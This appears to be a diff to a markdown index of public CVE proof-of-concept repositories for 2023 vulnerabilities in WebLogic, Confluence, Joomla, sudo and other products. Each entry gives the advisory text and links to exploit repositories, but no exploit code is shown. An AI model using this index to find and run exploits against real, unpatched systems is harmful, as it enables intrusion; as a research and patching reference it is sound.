+### CVE-2023-21768 (2023-01-10)
+
+Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
+
+
+- [Rosayxy/Recreate-cve-2023-21768](https://github.com/Rosayxy/Recreate-cve-2023-21768)
+- [Ha0-Y/CVE-2023-21768](https://github.com/Ha0-Y/CVE-2023-21768)
+- [xboxoneresearch/CVE-2023-21768-dotnet](https://github.com/xboxoneresearch/CVE-2023-21768-dotnet)
+
+### CVE-2023-21839 (2023-01-17)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
+
+
+- [MMarch7/weblogic_CVE-2023-21839_POC-EXP](https://github.com/MMarch7/weblogic_CVE-2023-21839_POC-EXP)
+- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test)
+- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931)
+
+### CVE-2023-21887 (2023-01-17)
+
+Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
+
+
+- [zwxxb/CVE-2023-21887](https://github.com/zwxxb/CVE-2023-21887)
+
+### CVE-2023-21931 (2023-04-18)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
+
+
+- [MMarch7/weblogic_CVE-2023-21931_POC-EXP](https://github.com/MMarch7/weblogic_CVE-2023-21931_POC-EXP)
+
+### CVE-2023-21939 (2023-04-18)
+
+Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
+
+
+- [Y4Sec-Team/CVE-2023-21939](https://github.com/Y4Sec-Team/CVE-2023-21939)
+
+### CVE-2023-22074 (2023-10-17)
+
+Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Supported versions that are affected are 19.3-19.20 and 21.3-21.11. Easily exploitable vulnerability allows high privileged attacker having Create Session, Select Any Dictionary privilege with network access via Oracle Net to compromise Oracle Database Sharding. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Database Sharding. CVSS 3.1 Base Score 2.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L).
+
+
+- [emad-almousa/CVE-2023-22074](https://github.com/emad-almousa/CVE-2023-22074)
+
+### CVE-2023-22515 (2023-10-04)
+
+Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. \r\n\r\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
+
+
+- [ErikWynter/CVE-2023-22515-Scan](https://github.com/ErikWynter/CVE-2023-22515-Scan)
+- [j3seer/CVE-2023-22515-POC](https://github.com/j3seer/CVE-2023-22515-POC)
+- [Chocapikk/CVE-2023-22515](https://github.com/Chocapikk/CVE-2023-22515)
+- [ad-calcium/CVE-2023-22515](https://github.com/ad-calcium/CVE-2023-22515)
+- [kh4sh3i/CVE-2023-22515](https://github.com/kh4sh3i/CVE-2023-22515)
+- [sincere9/CVE-2023-22515](https://github.com/sincere9/CVE-2023-22515)
+- [Le1a/CVE-2023-22515](https://github.com/Le1a/CVE-2023-22515)
+- [Vulnmachines/confluence-cve-2023-22515](https://github.com/Vulnmachines/confluence-cve-2023-22515)
+- [iveresk/CVE-2023-22515](https://github.com/iveresk/CVE-2023-22515)
+- [youcannotseemeagain/CVE-2023-22515_RCE](https://github.com/youcannotseemeagain/CVE-2023-22515_RCE)
+- [DsaHen/cve-2023-22515-exp](https://github.com/DsaHen/cve-2023-22515-exp)
+- [joaoviictorti/CVE-2023-22515](https://github.com/joaoviictorti/CVE-2023-22515)
+- [C1ph3rX13/CVE-2023-22515](https://github.com/C1ph3rX13/CVE-2023-22515)
+- [AIex-3/confluence-hack](https://github.com/AIex-3/confluence-hack)
+- [LucasPDiniz/CVE-2023-22515](https://github.com/LucasPDiniz/CVE-2023-22515)
+- [aaaademo/Confluence-EvilJar](https://github.com/aaaademo/Confluence-EvilJar)
+- [edsonjt81/CVE-2023-22515-Scan.](https://github.com/edsonjt81/CVE-2023-22515-Scan.)
+- [INTfinityConsulting/cve-2023-22515](https://github.com/INTfinityConsulting/cve-2023-22515)
+- [CalegariMindSec/Exploit-CVE-2023-22515](https://github.com/CalegariMindSec/Exploit-CVE-2023-22515)
+- [rxerium/CVE-2023-22515](https://github.com/rxerium/CVE-2023-22515)
+- [fyx1t/NSE--CVE-2023-22515](https://github.com/fyx1t/NSE--CVE-2023-22515)
+- [s1d6point7bugcrowd/CVE-2023-22515-check](https://github.com/s1d6point7bugcrowd/CVE-2023-22515-check)
+- [xorbbo/cve-2023-22515](https://github.com/xorbbo/cve-2023-22515)
+
+### CVE-2023-22518 (2023-10-31)
+
+All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability. \n\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
+
+
+- [ForceFledgling/CVE-2023-22518](https://github.com/ForceFledgling/CVE-2023-22518)
+- [davidfortytwo/CVE-2023-22518](https://github.com/davidfortytwo/CVE-2023-22518)
+- [RevoltSecurities/CVE-2023-22518](https://github.com/RevoltSecurities/CVE-2023-22518)
+- [0x0d3ad/CVE-2023-22518](https://github.com/0x0d3ad/CVE-2023-22518)
+- [C1ph3rX13/CVE-2023-22518](https://github.com/C1ph3rX13/CVE-2023-22518)
+- [bibo318/CVE-2023-22518](https://github.com/bibo318/CVE-2023-22518)
+- [Lilly-dox/Exploit-CVE-2023-22518](https://github.com/Lilly-dox/Exploit-CVE-2023-22518)
+
+### CVE-2023-22524 (2023-12-06)
+
+Certain versions of the Atlassian Companion App for MacOS were affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion’s blocklist and MacOS Gatekeeper to allow execution of code.
+
+
+- [imperva/CVE-2023-22524](https://github.com/imperva/CVE-2023-22524)
+- [ron-imperva/CVE-2023-22524](https://github.com/ron-imperva/CVE-2023-22524)
+
+### CVE-2023-22527 (2024-01-16)
+
+A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\n\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
+
+
+- [Avento/CVE-2023-22527_Confluence_RCE](https://github.com/Avento/CVE-2023-22527_Confluence_RCE)
+- [Sudistark/patch-diff-CVE-2023-22527](https://github.com/Sudistark/patch-diff-CVE-2023-22527)
+- [ga0we1/CVE-2023-22527_Confluence_RCE](https://github.com/ga0we1/CVE-2023-22527_Confluence_RCE)
+- [Drun1baby/CVE-2023-22527](https://github.com/Drun1baby/CVE-2023-22527)
+- [cleverg0d/CVE-2023-22527](https://github.com/cleverg0d/CVE-2023-22527)
+- [thanhlam-attt/CVE-2023-22527](https://github.com/thanhlam-attt/CVE-2023-22527)
+- [Manh130902/CVE-2023-22527-POC](https://github.com/Manh130902/CVE-2023-22527-POC)
+- [VNCERT-CC/CVE-2023-22527-confluence](https://github.com/VNCERT-CC/CVE-2023-22527-confluence)
+- [Vozec/CVE-2023-22527](https://github.com/Vozec/CVE-2023-22527)
+- [C1ph3rX13/CVE-2023-22527](https://github.com/C1ph3rX13/CVE-2023-22527)
+- [Niuwoo/CVE-2023-22527](https://github.com/Niuwoo/CVE-2023-22527)
+- [Chocapikk/CVE-2023-22527](https://github.com/Chocapikk/CVE-2023-22527)
+- [RevoltSecurities/CVE-2023-22527](https://github.com/RevoltSecurities/CVE-2023-22527)
+- [yoryio/CVE-2023-22527](https://github.com/yoryio/CVE-2023-22527)
+- [Privia-Security/CVE-2023-22527](https://github.com/Privia-Security/CVE-2023-22527)
+- [MaanVader/CVE-2023-22527-POC](https://github.com/MaanVader/CVE-2023-22527-POC)
+- [adminlove520/CVE-2023-22527](https://github.com/adminlove520/CVE-2023-22527)
+- [YongYe-Security/CVE-2023-22527](https://github.com/YongYe-Security/CVE-2023-22527)
+- [Boogipop/CVE-2023-22527-Godzilla-MEMSHELL](https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL)
+- [M0untainShley/CVE-2023-22527-MEMSHELL](https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL)
+- [vulncheck-oss/cve-2023-22527](https://github.com/vulncheck-oss/cve-2023-22527)
+- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)
+
+### CVE-2023-22726 (2023-01-20)
+
+act is a project which allows for local running of github actions. The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. The /upload endpoint is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. The /artifact endpoint is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server. This has been addressed in version 0.2.40. Users are advised to upgrade. Users unable to upgrade may, during implementation of Open and OpenAtEnd for FS, ensure to use ValidPath() to check against path traversal or clean the user-provided paths manually.
+
+
+- [ProxyPog/POC-CVE-2023-22726](https://github.com/ProxyPog/POC-CVE-2023-22726)
+
+### CVE-2023-22809 (2023-01-18)
+
+In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.
+
+
+- [asepsaepdin/CVE-2023-22809](https://github.com/asepsaepdin/CVE-2023-22809)
+- [Toothless5143/CVE-2023-22809](https://github.com/Toothless5143/CVE-2023-22809)
+
+### CVE-2023-22855 (2023-02-15)
+
+Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code.
+
+
+- [vianic/CVE-2023-22855](https://github.com/vianic/CVE-2023-22855)
+
+### CVE-2023-22884 (2023-01-21)
+
+Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.\n\n
+
+
+- [jakabakos/CVE-2023-22884-Airflow-SQLi](https://github.com/jakabakos/CVE-2023-22884-Airflow-SQLi)
+
+### CVE-2023-23333 (2023-02-06)
+
+There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
+
+
+- [emanueldosreis/nmap-CVE-2023-23333-exploit](https://github.com/emanueldosreis/nmap-CVE-2023-23333-exploit)
+- [binaryusergearone/SolarView-Compact-6.00-Command-Injection-Exploit-CVE-2023-23333-](https://github.com/binaryusergearone/SolarView-Compact-6.00-Command-Injection-Exploit-CVE-2023-23333-)
+
+### CVE-2023-23388 (2023-03-14)
+
+Windows Bluetooth Driver Elevation of Privilege Vulnerability
+
+
+- [ynwarcs/CVE-2023-23388](https://github.com/ynwarcs/CVE-2023-23388)
+
+### CVE-2023-23397 (2023-03-14)
+
+Microsoft Outlook Elevation of Privilege Vulnerability
+
+
+- [Muhammad-Ali007/OutlookNTLM_CVE-2023-23397](https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397)
+- [Pushkarup/CVE-2023-23397](https://github.com/Pushkarup/CVE-2023-23397)
+- [ducnorth2712/CVE-2023-23397](https://github.com/ducnorth2712/CVE-2023-23397)
+- [alsaeroth/CVE-2023-23397-POC](https://github.com/alsaeroth/CVE-2023-23397-POC)
+- [TheUnknownSoul/CVE-2023-23397-PoW](https://github.com/TheUnknownSoul/CVE-2023-23397-PoW)
+- [Symbolexe/CVE-2023-23397](https://github.com/Symbolexe/CVE-2023-23397)
+
+### CVE-2023-23583 (2023-11-14)
+
+Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access.
+
+
+- [Mav3r1ck0x1/CVE-2023-23583-Reptar-](https://github.com/Mav3r1ck0x1/CVE-2023-23583-Reptar-)
+
+### CVE-2023-23607 (2023-01-20)
+
+erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server. This issue has been addressed in version 1.05.00. Users are advised to upgrade. There are no known workarounds for this issue.\n
+
+
+- [Pylonet/CVE-2023-23607](https://github.com/Pylonet/CVE-2023-23607)
+
+### CVE-2023-23752 (2023-02-16)
+
+An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
+
+
+- [MrP4nda1337/CVE-2023-23752](https://github.com/MrP4nda1337/CVE-2023-23752)
+- [lainonz/CVE-2023-23752](https://github.com/lainonz/CVE-2023-23752)
+- [yTxZx/CVE-2023-23752](https://github.com/yTxZx/CVE-2023-23752)
+- [AlissonFaoli/CVE-2023-23752](https://github.com/AlissonFaoli/CVE-2023-23752)
+- [Pushkarup/CVE-2023-23752](https://github.com/Pushkarup/CVE-2023-23752)
+- [blacks1ph0n/CVE-2023-23752](https://github.com/blacks1ph0n/CVE-2023-23752)
+- [Youns92/Joomla-v4.2.8---CVE-2023-23752](https://github.com/Youns92/Joomla-v4.2.8---CVE-2023-23752)
+- [Ly0kha/Joomla-CVE-2023-23752-Exploit-Script](https://github.com/Ly0kha/Joomla-CVE-2023-23752-Exploit-Script)
+- [r3dston3/CVE-2023-23752](https://github.com/r3dston3/CVE-2023-23752)
+- [svaltheim/CVE-2023-23752](https://github.com/svaltheim/CVE-2023-23752)
+- [Fernando-olv/Joomla-CVE-2023-23752](https://github.com/Fernando-olv/Joomla-CVE-2023-23752)
+- [K3ysTr0K3R/CVE-2023-23752-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT)
+- [hadrian3689/CVE-2023-23752_Joomla](https://github.com/hadrian3689/CVE-2023-23752_Joomla)
+- [C1ph3rX13/CVE-2023-23752](https://github.com/C1ph3rX13/CVE-2023-23752)
+- [JeneralMotors/CVE-2023-23752](https://github.com/JeneralMotors/CVE-2023-23752)
+- [gunzf0x/CVE-2023-23752](https://github.com/gunzf0x/CVE-2023-23752)
+- [TindalyTn/CVE-2023-23752](https://github.com/TindalyTn/CVE-2023-23752)
+- [shellvik/CVE-2023-23752](https://github.com/shellvik/CVE-2023-23752)
+- [Rival420/CVE-2023-23752](https://github.com/Rival420/CVE-2023-23752)
+- [JohnDoeAnonITA/CVE-2023-23752](https://github.com/JohnDoeAnonITA/CVE-2023-23752)
+- [0xWhoami35/CVE-2023-23752](https://github.com/0xWhoami35/CVE-2023-23752)
+- [mariovata/CVE-2023-23752-Python](https://github.com/mariovata/CVE-2023-23752-Python)
+- [0xx01/CVE-2023-23752](https://github.com/0xx01/CVE-2023-23752)
+- [c0d3cr4f73r/CVE-2023-23752](https://github.com/c0d3cr4f73r/CVE-2023-23752)
+- [mil4ne/CVE-2023-23752-Joomla-v4.2.8](https://github.com/mil4ne/CVE-2023-23752-Joomla-v4.2.8)
+
+### CVE-2023-23946 (2023-02-14)
+
+Git, a revision control system, is vulnerable to path traversal prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside the working tree can be overwritten as the user who is running `git apply`. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use `git apply --stat` to inspect a patch before applying; avoid applying one that creates a symbolic link and then creates a file beyond the symbolic link.
+
+
+- [bruno-1337/CVE-2023-23946-POC](https://github.com/bruno-1337/CVE-2023-23946-POC)
+
+### CVE-2023-24044 (2023-01-22)
+
+A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. NOTE: the vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature."
+
+
+- [Cappricio-Securities/CVE-2023-24044](https://github.com/Cappricio-Securities/CVE-2023-24044)
+
+### CVE-2023-24078 (2023-02-17)
+
+Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.
+
+
+- [ag-rodriguez/CVE-2023-24078](https://github.com/ag-rodriguez/CVE-2023-24078)
+
+### CVE-2023-24100
+- [badboycxcc/CVE-2023-24100](https://github.com/badboycxcc/CVE-2023-24100)
+
+### CVE-2023-24203 (-)
+
+Cross Site Scripting vulnerability in SourceCodester Simple Customer Relationship Management System v1.0 allows attacker to execute arbitary code via the company or query parameter(s).
+
+
+- [momo1239/CVE-2023-24203-and-CVE-2023-24204](https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204)
+
+### CVE-2023-24329 (2023-02-17)
+
+An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.
+
+
+- [H4R335HR/CVE-2023-24329-PoC](https://github.com/H4R335HR/CVE-2023-24329-PoC)
+- [Pandante-Central/CVE-2023-24329-codeql-test](https://github.com/Pandante-Central/CVE-2023-24329-codeql-test)
+- [JawadPy/CVE-2023-24329-Exploit](https://github.com/JawadPy/CVE-2023-24329-Exploit)
+
+### CVE-2023-24488 (2023-07-10)
+
+Cross site scripting vulnerability in Citrix ADC and Citrix Gateway in allows and attacker to perform cross site scripting
+
+
+- [SirBugs/CVE-2023-24488-PoC](https://github.com/SirBugs/CVE-2023-24488-PoC)
+- [Abo5/CVE-2023-24488](https://github.com/Abo5/CVE-2023-24488)
+- [securitycipher/CVE-2023-24488](https://github.com/securitycipher/CVE-2023-24488)
+- [NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule](https://github.com/NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule)
+- [raytheon0x21/CVE-2023-24488](https://github.com/raytheon0x21/CVE-2023-24488)
+
+### CVE-2023-24489 (2023-07-10)
+
+\nA vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.
+
+
+- [adhikara13/CVE-2023-24489-ShareFile](https://github.com/adhikara13/CVE-2023-24489-ShareFile)
+- [whalebone7/CVE-2023-24489-poc](https://github.com/whalebone7/CVE-2023-24489-poc)
+
+### CVE-2023-24517 (2023-08-22)
+
+Unrestricted Upload of File with Dangerous Type vulnerability in the Pandora FMS File Manager component, allows an attacker to make make use of this issue ( unrestricted file upload ) to execute arbitrary system commands. This issue affects Pandora FMS v767 version and prior versions on all platforms.
+
+
+- [Argonx21/CVE-2023-24517](https://github.com/Argonx21/CVE-2023-24517)
+
+### CVE-2023-24538 (2023-04-06)
+
+Templates do not properly consider backticks (`) as Javascript string delimiters, and do not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template contains a Go template action within a Javascript template literal, the contents of the action can be used to terminate the literal, injecting arbitrary Javascript code into the Go template. As ES6 template literals are rather complex, and themselves can do string interpolation, the decision was made to simply disallow Go template actions from being used inside of them (e.g. "var a = {{.}}"), since there is no obviously safe way to allow this behavior. This takes the same approach as github.com/google/safehtml. With fix, Template.Parse returns an Error when it encounters templates like this, with an ErrorCode of value 12. This ErrorCode is currently unexported, but will be exported in the release of Go 1.21. Users who rely on the previous behavior can re-enable it using the GODEBUG flag jstmpllitinterp=1, with the caveat that backticks will now be escaped. This should be used with caution.
+
+
+- [skulkarni-mv/goIssue_dunfell](https://github.com/skulkarni-mv/goIssue_dunfell)
+- [skulkarni-mv/goIssue_kirkstone](https://github.com/skulkarni-mv/goIssue_kirkstone)
+
+### CVE-2023-24706
+- [hatjwe/CVE-2023-24706](https://github.com/hatjwe/CVE-2023-24706)
+
+### CVE-2023-24871 (2023-03-14)
+
+Windows Bluetooth Service Remote Code Execution Vulnerability
+
+
+- [ynwarcs/CVE-2023-24871](https://github.com/ynwarcs/CVE-2023-24871)
+
+### CVE-2023-24932 (2023-05-09)
+
+Secure Boot Security Feature Bypass Vulnerability
+
+
+- [ChristelVDH/Invoke-BlackLotusMitigation](https://github.com/ChristelVDH/Invoke-BlackLotusMitigation)
+
+### CVE-2023-24955 (2023-05-09)
+
+Microsoft SharePoint Server Remote Code Execution Vulnerability
+
+
+- [former-farmer/CVE-2023-24955-PoC](https://github.com/former-farmer/CVE-2023-24955-PoC)
+
+### CVE-2023-25136 (2023-02-03)
+
+OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible."
+
+
+- [Business1sg00d/CVE-2023-25136](https://github.com/Business1sg00d/CVE-2023-25136)
+- [malvika-thakur/CVE-2023-25136](https://github.com/malvika-thakur/CVE-2023-25136)
+
+### CVE-2023-25157 (2023-02-21)
+
+GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.
+
+
+- [Rubikcuv5/CVE-2023-25157](https://github.com/Rubikcuv5/CVE-2023-25157)
+- [dr-cable-tv/Geoserver-CVE-2023-25157](https://github.com/dr-cable-tv/Geoserver-CVE-2023-25157)
+
+### CVE-2023-25194 (2023-02-07)
+
+A possible security vulnerability has been identified in Apache Kafka Connect API.\nThis requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config\nand a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0.\nWhen configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config`\nproperty for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the\n`producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties.\nThis will allow the server to connect to the attacker's LDAP server\nand deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server.\nAttacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.\n\nSince Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box\nconfigurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector\nclient override policy that permits them.\n\nSince Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage\nin SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka Connect 3.4.0. \n\nWe advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for \nvulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally,\nin addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector\nclient config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.\n
+
+
+- [YongYe-Security/CVE-2023-25194](https://github.com/YongYe-Security/CVE-2023-25194)
+- [vulncheck-oss/cve-2023-25194](https://github.com/vulncheck-oss/cve-2023-25194)
+
+### CVE-2023-25202
+- [Trackflaw/CVE-2023-25202](https://github.com/Trackflaw/CVE-2023-25202)
+
+### CVE-2023-25203
+- [Trackflaw/CVE-2023-25203](https://github.com/Trackflaw/CVE-2023-25203)
+
+### CVE-2023-25690 (2023-03-07)
+
+Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack.\n\n\n\n\nConfigurations are affected when mod_proxy is enabled along with some form of RewriteRule\n or ProxyPassMatch in which a non-specific pattern matches\n some portion of the user-supplied request-target (URL) data and is then\n re-inserted into the proxied request-target using variable \nsubstitution. For example, something like:\n\n\n\n\nRewriteEngine on\nRewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P]\nProxyPassReverse /here/ http://example.com:8080/\n\n\nRequest splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.\n\n\n
+
+
+- [thanhlam-attt/CVE-2023-25690](https://github.com/thanhlam-attt/CVE-2023-25690)
+
+### CVE-2023-25725 (2023-02-14)
+
+HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after being parsed and processed for HTTP/1.0 and HTTP/1.1. For HTTP/2 and HTTP/3, the impact is limited because the headers disappear before being parsed and processed, as if they had not been sent by the client. The fixed versions are 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, and 2.0.31.
+
+
+- [sgwgsw/LAB-CVE-2023-25725](https://github.com/sgwgsw/LAB-CVE-2023-25725)
+
+### CVE-2023-25813 (2023-02-22)
+
+Sequelize is a Node.js ORM tool. In versions prior to 6.19.1 a SQL injection exploit exists related to replacements. Parameters which are passed through replacements are not properly escaped which can lead to arbitrary SQL injection depending on the specific queries in use. The issue has been fixed in Sequelize 6.19.1. Users are advised to upgrade. Users unable to upgrade should not use the `replacements` and the `where` option in the same query.
+
+
+- [bde574786/Sequelize-1day-CVE-2023-25813](https://github.com/bde574786/Sequelize-1day-CVE-2023-25813)
+
+### CVE-2023-25950 (2023-04-11)
+
+HTTP request/response smuggling vulnerability in HAProxy version 2.7.0, and 2.6.1 to 2.6.7 allows a remote attacker to alter a legitimate user's request. As a result, the attacker may obtain sensitive information or cause a denial-of-service (DoS) condition.
+
+
+- [dhmosfunk/HTTP3ONSTEROIDS](https://github.com/dhmosfunk/HTTP3ONSTEROIDS)
+
+### CVE-2023-26035 (2023-02-25)
+
+ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.
+
+
+- [rvizx/CVE-2023-26035](https://github.com/rvizx/CVE-2023-26035)
